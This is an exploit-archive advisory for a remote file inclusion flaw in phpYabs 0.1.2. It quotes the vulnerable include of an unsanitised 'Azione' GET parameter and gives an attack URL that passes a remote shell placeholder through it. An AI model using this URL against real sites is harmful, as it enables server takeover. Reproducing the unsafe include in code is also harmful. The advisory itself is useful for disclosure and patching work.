id: 4814
date: 02/06/2009
title: phpYabs 0.1.2 (Azione) Remote File Inclusion Vulnerability
author: Arka69
cves: 

==========================================================
phpYabs 0.1.2 (Azione) Remote File Inclusion Vulnerability
==========================================================


********************************************************************************
                                             phpyabs 0.1.2 RFI Vulnerability

********************************************************************************
FOUND BY: Arka69
BUG: Remote File Include (RFI)
CMS: phpyabs 0.1.2
********************************************************************************

VULNERABLE CODE: (phpyabs/moduli/libri/index.php)

  include($_GET['Azione'].".php");

********************************************************************************
RFI:

http://victim.com/phpyabs/moduli/libri/index.php?Azione=[SHELL]



#  0day.today [2023-03-27]  #